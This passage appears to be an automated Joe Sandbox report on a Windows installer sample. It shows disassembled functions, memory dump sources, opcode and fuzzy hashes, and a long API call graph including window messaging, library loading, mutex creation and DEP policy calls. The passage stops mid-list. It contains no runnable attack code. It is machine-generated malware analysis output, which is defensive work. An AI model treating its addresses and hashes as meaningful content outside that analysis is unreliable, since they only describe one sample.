                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3152942510.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3152265849.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3162346883.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3164347770.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: QueryValue
                                                                                                                                                                                                                                  • String ID: )q@
                                                                                                                                                                                                                                  • API String ID: 3660427363-2284170586
                                                                                                                                                                                                                                  • Opcode ID: 32d2d681139902fa63b50b1e86c1c6042aee641263ad409bd5d16b68eaa8278f
                                                                                                                                                                                                                                  • Instruction ID: 22a93fbabe645b78fd14ced98f65bd4bcb22fe3fd6f8222f7fa8e6a3c98f8dfc
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 32d2d681139902fa63b50b1e86c1c6042aee641263ad409bd5d16b68eaa8278f
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E6415E31D0021AAFDB21DF95C881BAFB7B8EB04704F56447AE901F7280D738AF108B99
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00409C88 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 30windowCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • MessageBoxA.USER32(00000000,00000000,Setup,00000010), ref: 00409CBD
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  • Setup, xrefs: 00409CAD
                                                                                                                                                                                                                                  • The Setup program accepts optional command line parameters./HELP, /?Shows this information./SP-Disables the This will install... Do you wish to continue? prompt at the beginning of Setup./SILENT, /VERYSILENTInstructs Setup to be silent or very si, xrefs: 00409CA1
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3152942510.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3152265849.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3162346883.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3164347770.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Message
                                                                                                                                                                                                                                  • String ID: Setup$The Setup program accepts optional command line parameters./HELP, /?Shows this information./SP-Disables the This will install... Do you wish to continue? prompt at the beginning of Setup./SILENT, /VERYSILENTInstructs Setup to be silent or very si
                                                                                                                                                                                                                                  • API String ID: 2030045667-3271211647
                                                                                                                                                                                                                                  • Opcode ID: bc66b1cf8cea732a030952d466b76090b354ad7a58696f118c0a4b0261ee3717
                                                                                                                                                                                                                                  • Instruction ID: b8b600ed6bdfe48e96a015bdf4867c85bc36f5512d0f27a60c0f94c744360238
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bc66b1cf8cea732a030952d466b76090b354ad7a58696f118c0a4b0261ee3717
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8EE0E5302482087EE311EA528C13F6A7BACE789B04F600477F900B15C3D6786E00A068
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 004030DC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 9COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetModuleHandleA.KERNEL32(00000000,0040A60E), ref: 004030E3
                                                                                                                                                                                                                                  • GetCommandLineA.KERNEL32(00000000,0040A60E), ref: 004030EE
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3152942510.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3152265849.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3162346883.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3164347770.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CommandHandleLineModule
                                                                                                                                                                                                                                  • String ID: U1hd.@
                                                                                                                                                                                                                                  • API String ID: 2123368496-2904493091
                                                                                                                                                                                                                                  • Opcode ID: ab44cebb113f23cc453db0582047ce3f33ed2b100303cb8959b7892e21e32e4b
                                                                                                                                                                                                                                  • Instruction ID: 0f926add87520dc699e98d27074396f9fab16295c11a520b4b5863bd90c7cb52
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ab44cebb113f23cc453db0582047ce3f33ed2b100303cb8959b7892e21e32e4b
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 03C01274541300CAD328AFF69E8A304B990A385349F40823FA608BA2F1CA7C4201EBDD
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 004094D8 Relevance: 5.0, APIs: 4, Instructions: 45sleepCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • Sleep.KERNEL32(?,?,?,?,0000000D,?,0040ABED,000000FA,00000032,0040AC54), ref: 004094F7
                                                                                                                                                                                                                                  • Sleep.KERNEL32(?,?,?,?,0000000D,?,0040ABED,000000FA,00000032,0040AC54), ref: 00409507
                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,0000000D,?,0040ABED,000000FA,00000032,0040AC54), ref: 0040951A
                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,0000000D,?,0040ABED,000000FA,00000032,0040AC54), ref: 00409524
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3152942510.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3152265849.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3162346883.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3164347770.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ErrorLastSleep
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1458359878-0
                                                                                                                                                                                                                                  • Opcode ID: 97bb3b87fdda019371420e794be163fcf62410a15a23215566f33b90e6dc6563
                                                                                                                                                                                                                                  • Instruction ID: cd4a420f7ace5638a97e0bdb8a1e9fccbb234b9240edd4770f97938e6011a3cc
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 97bb3b87fdda019371420e794be163fcf62410a15a23215566f33b90e6dc6563
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 16F0967360451477CA35A5AF9D81A5F634DDAD1354B10813BE945F3283C538DD0142A9
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                                                                  Execution Coverage:16%
                                                                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                  Signature Coverage:4.8%
                                                                                                                                                                                                                                  Total number of Nodes:2000
                                                                                                                                                                                                                                  Total number of Limit Nodes:102
                                                                                                                                                                                                                                  execution_graph 49941 40cd00 49942 40cd12 49941->49942 49943 40cd0d 49941->49943 49945 406f48 CloseHandle 49943->49945 49945->49942 49946 492848 49947 49287c 49946->49947 49948 49287e 49947->49948 49949 492892 49947->49949 50092 446f9c 32 API calls 49948->50092 49952 4928ce 49949->49952 49953 4928a1 49949->49953 49951 492887 Sleep 50045 492905 49951->50045 49958 49290a 49952->49958 49959 4928dd 49952->49959 49955 446ff8 32 API calls 49953->49955 49957 4928b0 49955->49957 49961 4928b8 FindWindowA 49957->49961 49964 492919 49958->49964 49965 492960 49958->49965 50082 446ff8 49959->50082 49963 447278 19 API calls 49961->49963 49962 4928ea 49966 4928f2 FindWindowA 49962->49966 50032 4928c9 49963->50032 50093 446f9c 32 API calls 49964->50093 49970 4929bc 49965->49970 49971 49296f 49965->49971 50086 447278 49966->50086 49969 492925 50094 446f9c 32 API calls 49969->50094 49977 492a18 49970->49977 49978 4929cb 49970->49978 50097 446f9c 32 API calls 49971->50097 49974 492932 50095 446f9c 32 API calls 49974->50095 49975 49297b 50098 446f9c 32 API calls 49975->50098 49988 492a52 49977->49988 49989 492a27 49977->49989 50102 446f9c 32 API calls 49978->50102 49980 49293f 50096 446f9c 32 API calls 49980->50096 49983 492988 50099 446f9c 32 API calls 49983->50099 49984 49294a SendMessageA 49987 447278 19 API calls 49984->49987 49985 4929d7 50103 446f9c 32 API calls 49985->50103 49987->50032 50000 492a61 49988->50000 50001 492aa0 49988->50001 49992 446ff8 32 API calls 49989->49992 49991 492995 50100 446f9c 32 API calls 49991->50100 49995 492a34 49992->49995 49993 4929e4 50104 446f9c 32 API calls 49993->50104 50002 492a3c RegisterClipboardFormatA 49995->50002 49997 4929a0 PostMessageA 50101 4470d0 19 API calls 49997->50101 49999 4929f1 50105 446f9c 32 API calls 49999->50105 50107 446f9c 32 API calls 50000->50107 50009 492aaf 50001->50009 50010 492af4 50001->50010 50005 447278 19 API calls 50002->50005 50005->50045 50006 4929fc SendNotifyMessageA 50106 4470d0 19 API calls 50006->50106 50007 492a6d 50108 446f9c 32 API calls 50007->50108 50110 446f9c 32 API calls 50009->50110 50017 492b48 50010->50017 50018 492b03 50010->50018 50012 492a7a 50109 446f9c 32 API calls 50012->50109 50015 492abb 50111 446f9c 32 API calls 50015->50111 50016 492a85 SendMessageA 50020 447278 19 API calls 50016->50020 50025 492b57 50017->50025 50031 492baa 50017->50031 50114 446f9c 32 API calls 50018->50114 50020->50032 50022 492ac8 50112 446f9c 32 API calls 50022->50112 50023 492b0f 50115 446f9c 32 API calls 50023->50115 50029 446ff8 32 API calls 50025->50029 50027 492ad3 PostMessageA 50113 4470d0 19 API calls 50027->50113 50033 492b64 50029->50033 50030 492b1c 50116 446f9c 32 API calls 50030->50116 50035 492bb9 50031->50035 50036 492c31 50031->50036 50032->50045 50118 42e394 SetErrorMode 50033->50118 50039 446ff8 32 API calls 50035->50039 50047 492c40 50036->50047 50048 492c66 50036->50048 50038 492b27 SendNotifyMessageA 50117 4470d0 19 API calls 50038->50117 50042 492bc8 50039->50042 50040 492b71 50043 492b87 GetLastError 50040->50043 50044 492b77 50040->50044 50121 446f9c 32 API calls 50042->50121 50049 447278 19 API calls 50043->50049 50046 447278 19 API calls 50044->50046 50132 403420 50045->50132 50050 492b85 50046->50050 50126 446f9c 32 API calls 50047->50126 50055 492c98 50048->50055 50056 492c75 50048->50056 50049->50050 50054 447278 19 API calls 50050->50054 50053 492c4a FreeLibrary 50127 4470d0 19 API calls 50053->50127 50054->50045 50065 492ca7 50055->50065 50071 492cdb 50055->50071 50059 446ff8 32 API calls 50056->50059 50057 492bdb GetProcAddress 50060 492c21 50057->50060 50061 492be7 50057->50061 50062 492c81 50059->50062 50125 4470d0 19 API calls 50060->50125 50122 446f9c 32 API calls 50061->50122 50067 492c89 CreateMutexA 50062->50067 50128 48ccc8 32 API calls 50065->50128 50066 492bf3 50123 446f9c 32 API calls 50066->50123 50067->50045 50070 492c00 50074 447278 19 API calls 50070->50074 50071->50045 50130 48ccc8 32 API calls 50071->50130 50073 492cb3 50076 492cc4 OemToCharBuffA 50073->50076 50075 492c11 50074->50075 50124 4470d0 19 API calls 50075->50124 50129 48cce0 19 API calls 50076->50129 50079 492cf6 50080 492d07 CharToOemBuffA 50079->50080 50131 48cce0 19 API calls 50080->50131 50083 447000 50082->50083 50136 436078 50083->50136 50085 44701f 50085->49962 50087 447280 50086->50087 50249 4363e0 VariantClear 50087->50249 50089 4472ba 50089->50045 50090 4472a3 50090->50089 50250 408c0c 18 API calls 50090->50250 50092->49951 50093->49969 50094->49974 50095->49980 50096->49984 50097->49975 50098->49983 50099->49991 50100->49997 50101->50032 50102->49985 50103->49993 50104->49999 50105->50006 50106->50045 50107->50007 50108->50012 50109->50016 50110->50015 50111->50022 50112->50027 50113->50032 50114->50023 50115->50030 50116->50038 50117->50045 50251 403738 50118->50251 50121->50057 50122->50066 50123->50070 50124->50032 50125->50032 50126->50053 50127->50045 50128->50073 50129->50045 50130->50079 50131->50045 50134 403426 50132->50134 50133 40344b 50134->50133 50135 402660 4 API calls 50134->50135 50135->50134 50137 436084 50136->50137 50147 4360a6 50136->50147 50137->50147 50156 408c0c 18 API calls 50137->50156 50138 436129 50165 408c0c 18 API calls 50138->50165 50140 436111 50160 403494 50140->50160 50141 436105 50141->50085 50142 4360f9 50151 403510 18 API calls 50142->50151 50143 4360ed 50157 403510 50143->50157 50144 43611d 50164 4040e8 32 API calls 50144->50164 50147->50138 50147->50140 50147->50141 50147->50142 50147->50143 50147->50144 50150 43613a 50150->50085 50155 436102 50151->50155 50153 436126 50153->50085 50155->50085 50156->50147 50166 4034e0 50157->50166 50162 403498 50160->50162 50161 4034ba 50161->50085 50162->50161 50163 402660 4 API calls 50162->50163 50163->50161 50164->50153 50165->50150 50171 4034bc 50166->50171 50168 4034f0 50176 403400 50168->50176 50172 4034c0 50171->50172 50173 4034dc 50171->50173 50180 402648 50172->50180 50173->50168 50175 4034c9 50175->50168 50177 403406 50176->50177 50178 40341f 50176->50178 50177->50178 50244 402660 50177->50244 50178->50085 50181 40264c 50180->50181 50183 402656 50180->50183 50186 402088 50181->50186 50182 402652 50182->50183 50197 4033bc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50182->50197 50183->50175 50183->50183 50187 40209c 50186->50187 50188 4020a1 50186->50188 50198 4019cc RtlInitializeCriticalSection 50187->50198 50190 4020c6 RtlEnterCriticalSection 50188->50190 50191 4020d0 50188->50191 50192 4020a5 50188->50192 50190->50191 50191->50192 50205 401f94 50191->50205 50192->50182 50195 4021f1 RtlLeaveCriticalSection 50196 4021fb 50195->50196 50196->50182 50197->50183 50199 4019f0 RtlEnterCriticalSection 50198->50199 50200 4019fa 50198->50200 50199->50200 50201 401a18 LocalAlloc 50200->50201 50202 401a32 50201->50202 50203 401a81 50202->50203 50204 401a77 RtlLeaveCriticalSection 50202->50204 50203->50188 50204->50203 50206 401fa4 50205->50206 50207 401fd0 50206->50207 50210 401ff4 50206->50210 50211 401f0c 50206->50211 50207->50210 50216 401db4 50207->50216 50210->50195 50210->50196 50220 40178c 50211->50220 50215 401f29 50215->50206 50217 401e02 50216->50217 50218 401dd2 50216->50218 50217->50218 50231 401d1c 50217->50231 50218->50210 50223 4017a8 50220->50223 50221 4014e4 LocalAlloc VirtualAlloc VirtualFree 50221->50223 50222 4017b2 50224 401678 VirtualAlloc 50222->50224 50223->50221 50223->50222 50225 40180f 50223->50225 50226 4013e0 LocalAlloc 50223->50226 50227 401803 50223->50227 50228 4017be 50224->50228 50225->50215 50230 401e80 9 API calls 50225->50230 50226->50223 50229 4015c0 VirtualFree 50227->50229 50228->50225 50229->50225 50230->50215 50232 401d2e 50231->50232 50233 401d51 50232->50233 50234 401d63 50232->50234 50235 401940 LocalAlloc VirtualFree VirtualFree 50233->50235 50236 401940 LocalAlloc VirtualFree VirtualFree 50234->50236 50237 401d61 50235->50237 50236->50237 50238 401d79 50237->50238 50239 401bf8 9 API calls 50237->50239 50238->50218 50240 401d88 50239->50240 50241 401da2 50240->50241 50242 401c4c 9 API calls 50240->50242 50243 401454 LocalAlloc 50241->50243 50242->50241 50243->50238 50245 402664 50244->50245 50246 40266e 50244->50246 50245->50246 50248 4033bc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50245->50248 50246->50178 50246->50246 50248->50246 50249->50090 50250->50089 50252 40373c LoadLibraryA 50251->50252 50252->50040 54027 498ba8 54085 403344 54027->54085 54029 498bb6 54088 4056a0 54029->54088 54031 498bbb 54091 40631c GetModuleHandleA GetProcAddress 54031->54091 54035 498bc5 54099 40994c 54035->54099 54366 4032fc 54085->54366 54087 403349 GetModuleHandleA GetCommandLineA 54087->54029 54090 4056db 54088->54090 54367 4033bc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 54088->54367 54090->54031 54092 406338 54091->54092 54093 40633f GetProcAddress 54091->54093 54092->54093 54094 406355 GetProcAddress 54093->54094 54095 40634e 54093->54095 54096 406364 SetProcessDEPPolicy 54094->54096 54097 406368 54094->54097 54095->54094 54096->54097 54098 4063c4 6F571CD0 54097->54098 54098->54035 54368 409024 54099->54368 54366->54087 54367->54090 54369 408cbc 19 API calls 54368->54369 54370 409035 54369->54370 54371 4085dc GetSystemDefaultLCID 54370->54371 54375 408612 54371->54375 54372 408568 19 API calls 54372->54375 54373 403450 18 API calls 54373->54375 54374 406dec 19 API calls 54374->54375 54375->54372 54375->54373 54375->54374 54376 408674 54375->54376 54377 403450 18 API calls 54376->54377 54378 406dec 19 API calls 54376->54378 54379 408568 19 API calls 54376->54379 54380 4086f7 54376->54380 54377->54376 54378->54376 54379->54376 54381 403420 4 API calls 54380->54381 54382 408711 54381->54382 54383 408720 GetSystemDefaultLCID 54382->54383 54440 408568 GetLocaleInfoA 54383->54440 54386 403450 18 API calls 54387 408760 54386->54387 54388 408568 19 API calls 54387->54388 54389 408775 54388->54389 54390 408568 19 API calls 54389->54390 54391 408799 54390->54391 54446 4085b4 GetLocaleInfoA 54391->54446 54394 4085b4 GetLocaleInfoA 54395 4087c9 54394->54395 54396 408568 19 API calls 54395->54396 54397 4087e3 54396->54397 54398 4085b4 GetLocaleInfoA 54397->54398 54399 408800 54398->54399 54400 408568 19 API calls 54399->54400 54441 4085a1 54440->54441 54442 40858f 54440->54442 54443 403494 4 API calls 54441->54443 54444 4034e0 18 API calls 54442->54444 54445 40859f 54443->54445 54444->54445 54445->54386 54447 4085d0 54446->54447 54447->54394 55799 42f520 55800 42f52b 55799->55800 55801 42f52f NtdllDefWindowProc_A 55799->55801 55801->55800 50253 416b42 50254 416bea 50253->50254 50255 416b5a 50253->50255 50272 41531c 18 API calls 50254->50272 50257 416b74 SendMessageA 50255->50257 50258 416b68 50255->50258 50268 416bc8 50257->50268 50259 416b72 CallWindowProcA 50258->50259 50260 416b8e 50258->50260 50259->50268 50269 41a058 GetSysColor 50260->50269 50263 416b99 SetTextColor 50264 416bae 50263->50264 50270 41a058 GetSysColor 50264->50270 50266 416bb3 SetBkColor 50271 41a6e0 GetSysColor CreateBrushIndirect 50266->50271 50269->50263 50270->50266 50271->50268 50272->50268 55802 4358e0 55803 4358f5 55802->55803 55807 43590f 55803->55807 55808 4352c8 55803->55808 55813 435312 55808->55813 55819 4352f8 55808->55819 55809 403400 4 API calls 55810 435717 55809->55810 55810->55807 55821 435728 18 API calls 55810->55821 55811 446da4 18 API calls 55811->55819 55812 402648 18 API calls 55812->55819 55813->55809 55815 431ca0 18 API calls 55815->55819 55816 403450 18 API calls 55816->55819 55817 403744 18 API calls 55817->55819 55818 4038a4 18 API calls 55818->55819 55819->55811 55819->55812 55819->55813 55819->55815 55819->55816 55819->55817 55819->55818 55822 4343b0 55819->55822 55834 434b74 18 API calls 55819->55834 55821->55807 55823 43446d 55822->55823 55824 4343dd 55822->55824 55853 434310 18 API calls 55823->55853 55825 403494 4 API calls 55824->55825 55827 4343eb 55825->55827 55829 403778 18 API calls 55827->55829 55828 403400 4 API calls 55830 4344bd 55828->55830 55832 43440c 55829->55832 55830->55819 55831 43445f 55831->55828 55832->55831 55835 494944 55832->55835 55834->55819 55836 49497c 55835->55836 55837 494a14 55835->55837 55838 403494 4 API calls 55836->55838 55854 448930 55837->55854 55842 494987 55838->55842 55840 494997 55841 403400 4 API calls 55840->55841 55843 494a38 55841->55843 55842->55840 55844 4037b8 18 API calls 55842->55844 55845 403400 4 API calls 55843->55845 55847 4949b0 55844->55847 55846 494a40 55845->55846 55846->55832 55847->55840 55848 4037b8 18 API calls 55847->55848 55849 4949d3 55848->55849 55850 403778 18 API calls 55849->55850 55851 494a04 55850->55851 55852 403634 18 API calls 55851->55852 55852->55837 55853->55831 55855 448955 55854->55855 55856 448998 55854->55856 55857 403494 4 API calls 55855->55857 55858 4489ac 55856->55858 55866 44852c 55856->55866 55859 448960 55857->55859 55861 403400 4 API calls 55858->55861 55863 4037b8 18 API calls 55859->55863 55862 4489df 55861->55862 55862->55840 55864 44897c 55863->55864 55865 4037b8 18 API calls 55864->55865 55865->55856 55867 403494 4 API calls 55866->55867 55868 448562 55867->55868 55869 4037b8 18 API calls 55868->55869 55870 448574 55869->55870 55871 403778 18 API calls 55870->55871 55872 448595 55871->55872 55873 4037b8 18 API calls 55872->55873 55874 4485ad 55873->55874 55875 403778 18 API calls 55874->55875 55876 4485d8 55875->55876 55877 4037b8 18 API calls 55876->55877 55886 4485f0 55877->55886 55878 448628 55880 403420 4 API calls 55878->55880 55879 4486c3 55884 4486cb GetProcAddress 55879->55884 55881 448708 55880->55881 55881->55858 55882 44864b LoadLibraryExA 55882->55886 55883 44865d LoadLibraryA 55883->55886 55885 4486de 55884->55885 55885->55878 55886->55878 55886->55879 55886->55882 55886->55883 55887 403b80 18 API calls 55886->55887 55888 403450 18 API calls 55886->55888 55890 43da88 18 API calls 55886->55890 55887->55886 55888->55886 55890->55886 50273 416644 50274 416651 50273->50274 50275 4166ab 50273->50275 50280 416550 CreateWindowExA 50274->50280 50276 416658 SetPropA SetPropA 50276->50275 50277 41668b 50276->50277 50278 41669e SetWindowPos 50277->50278 50278->50275 50280->50276 55891 4222e4 55892 4222f3 55891->55892 55897 421274 55892->55897 55895 422313 55898 4212e3 55897->55898 55911 421283 55897->55911 55901 4212f4 55898->55901 55922 4124d0 GetMenuItemCount GetMenuStringA GetMenuState 55898->55922 55900 421322 55903 421395 55900->55903 55908 42133d 55900->55908 55901->55900 55902 4213ba 55901->55902 55905 4213ce SetMenu 55902->55905 55919 421393 55902->55919 55910 4213a9 55903->55910 55903->55919 55904 4213e6 55925 4211bc 24 API calls 55904->55925 55905->55919 55914 421360 GetMenu 55908->55914 55908->55919 55909 4213ed 55909->55895 55920 4221e8 10 API calls 55909->55920 55913 4213b2 SetMenu 55910->55913 55911->55898 55921 408d2c 33 API calls 55911->55921 55913->55919 55915 421383 55914->55915 55916 42136a 55914->55916 55923 4124d0 GetMenuItemCount GetMenuStringA GetMenuState 55915->55923 55918 42137d SetMenu 55916->55918 55918->55915 55919->55904 55924 421e2c 25 API calls 55919->55924 55920->55895 55921->55911 55922->55901 55923->55919 55924->55904 55925->55909 55926 44b4a8 55927 44b4b6 55926->55927 55929 44b4d5 55926->55929 55928 44b38c 25 API calls 55927->55928 55927->55929 55928->55929 55930 448728 55931 448756 55930->55931 55932 44875d 55930->55932 55934 403400 4 API calls 55931->55934 55933 448771 55932->55933 55935 44852c 21 API calls 55932->55935 55933->55931 55936 403494 4 API calls 55933->55936 55937 448907 55934->55937 55935->55933 55938 44878a 55936->55938 55939 4037b8 18 API calls 55938->55939 55940 4487a6 55939->55940 55941 4037b8 18 API calls 55940->55941 55942 4487c2 55941->55942 55942->55931 55943 4487d6 55942->55943 55944 4037b8 18 API calls 55943->55944 55945 4487f0 55944->55945 55946 431bd0 18 API calls 55945->55946 55947 448812 55946->55947 55948 431ca0 18 API calls 55947->55948 55955 448832 55947->55955 55948->55947 55949 448888 55962 442334 55949->55962 55950 448870 55950->55949 55974 4435d0 18 API calls 55950->55974 55954 4488bc GetLastError 55975 4484c0 18 API calls 55954->55975 55955->55950 55973 4435d0 18 API calls 55955->55973 55957 4488cb 55976 443610 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 55957->55976 55959 4488e0 55977 443620 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 55959->55977 55961 4488e8 55963 443312 55962->55963 55964 44236d 55962->55964 55966 403400 4 API calls 55963->55966 55965 403400 4 API calls 55964->55965 55967 442375 55965->55967 55968 443327 55966->55968 55969 431bd0 18 API calls 55967->55969 55968->55954 55970 442381 55969->55970 55971 443302 55970->55971 55978 441a0c 18 API calls 55970->55978 55971->55954 55973->55955 55974->55949 55975->55957 55976->55959 55977->55961 55978->55970 55979 4165ec DestroyWindow 55980 42e3ef SetErrorMode 50281 441394 50282 44139d 50281->50282 50283 4413ab CreateFileA 50281->50283 50282->50283 50284 4413b6 50283->50284 55981 491bf8 55982 491c32 55981->55982 55983 491c34 55982->55983 55986 491c3e 55982->55986 56176 409098 MessageBeep 55983->56176 55985 491c39 55989 403420 4 API calls 55985->55989 55987 491c4d 55986->55987 55988 491c76 55986->55988 55990 446ff8 32 API calls 55987->55990 55993 491cae 55988->55993 55994 491c85 55988->55994 55991 49228a 55989->55991 55992 491c5a 55990->55992 55995 403400 4 API calls 55991->55995 56177 406bb0 55992->56177 56003 491cbd 55993->56003 56004 491ce6 55993->56004 55997 446ff8 32 API calls 55994->55997 55998 492292 55995->55998 56000 491c92 55997->56000 56185 406c00 18 API calls 56000->56185 56006 446ff8 32 API calls 56003->56006 56010 491d0e 56004->56010 56011 491cf5 56004->56011 56005 491c9d 56186 44734c 19 API calls 56005->56186 56008 491cca 56006->56008 56187 406c34 18 API calls 56008->56187 56017 491d1d 56010->56017 56018 491d42 56010->56018 56189 407280 19 API calls 56011->56189 56012 491cd5 56188 44734c 19 API calls 56012->56188 56015 491cfd 56190 44734c 19 API calls 56015->56190 56019 446ff8 32 API calls 56017->56019 56022 491d7a 56018->56022 56023 491d51 56018->56023 56020 491d2a 56019->56020 56021 4072a8 SetCurrentDirectoryA 56020->56021 56024 491d32 56021->56024 56028 491d89 56022->56028 56029 491db2 56022->56029 56025 446ff8 32 API calls 56023->56025 56191 4470d0 19 API calls 56024->56191 56027 491d5e 56025->56027 56030 42c804 19 API calls 56027->56030 56031 446ff8 32 API calls 56028->56031 56036 491dfe 56029->56036 56037 491dc1 56029->56037 56032 491d69 56030->56032 56033 491d96 56031->56033 56192 44734c 19 API calls 56032->56192 56193 4071f8 22 API calls 56033->56193 56043 491e0d 56036->56043 56044 491e36 56036->56044 56039 446ff8 32 API calls 56037->56039 56038 491da1 56194 44734c 19 API calls 56038->56194 56041 491dd0 56039->56041 56042 446ff8 32 API calls 56041->56042 56045 491de1 56042->56045 56046 446ff8 32 API calls 56043->56046 56050 491e6e 56044->56050 56051 491e45 56044->56051 56195 4918fc 22 API calls 56045->56195 56048 491e1a 56046->56048 56052 42c8a4 19 API calls 56048->56052 56049 491ded 56196 44734c 19 API calls 56049->56196 56059 491e7d 56050->56059 56060 491ea6 56050->56060 56054 446ff8 32 API calls 56051->56054 56055 491e25 56052->56055 56056 491e52 56054->56056 56197 44734c 19 API calls 56055->56197 56058 42c8cc 19 API calls 56056->56058 56061 491e5d 56058->56061 56062 446ff8 32 API calls 56059->56062 56066 491ede 56060->56066 56067 491eb5 56060->56067 56198 44734c 19 API calls 56061->56198 56064 491e8a 56062->56064 56199 42c8fc 19 API calls 56064->56199 56072 491eed 56066->56072 56073 491f16 56066->56073 56069 446ff8 32 API calls 56067->56069 56068 491e95 56200 44734c 19 API calls 56068->56200 56071 491ec2 56069->56071 56074 42c92c 19 API calls 56071->56074 56075 446ff8 32 API calls 56072->56075 56080 491f62 56073->56080 56081 491f25 56073->56081 56076 491ecd 56074->56076 56077 491efa 56075->56077 56201 44734c 19 API calls 56076->56201 56079 42c954 19 API calls 56077->56079 56082 491f05 56079->56082 56086 491f71 56080->56086 56087 491fb4 56080->56087 56083 446ff8 32 API calls 56081->56083 56202 44734c 19 API calls 56082->56202 56085 491f34 56083->56085 56088 446ff8 32 API calls 56085->56088 56089 446ff8 32 API calls 56086->56089 56094 491fc3 56087->56094 56095 492027 56087->56095 56090 491f45 56088->56090 56092 491f84 56089->56092 56203 42c4f8 19 API calls 56090->56203 56096 446ff8 32 API calls 56092->56096 56093 491f51 56204 44734c 19 API calls 56093->56204 56098 446ff8 32 API calls 56094->56098 56102 492066 56095->56102 56103 492036 56095->56103 56099 491f95 56096->56099 56100 491fd0 56098->56100 56205 491af4 26 API calls 56099->56205 56168 42c608 21 API calls 56100->56168 56115 4920a5 56102->56115 56116 492075 56102->56116 56106 446ff8 32 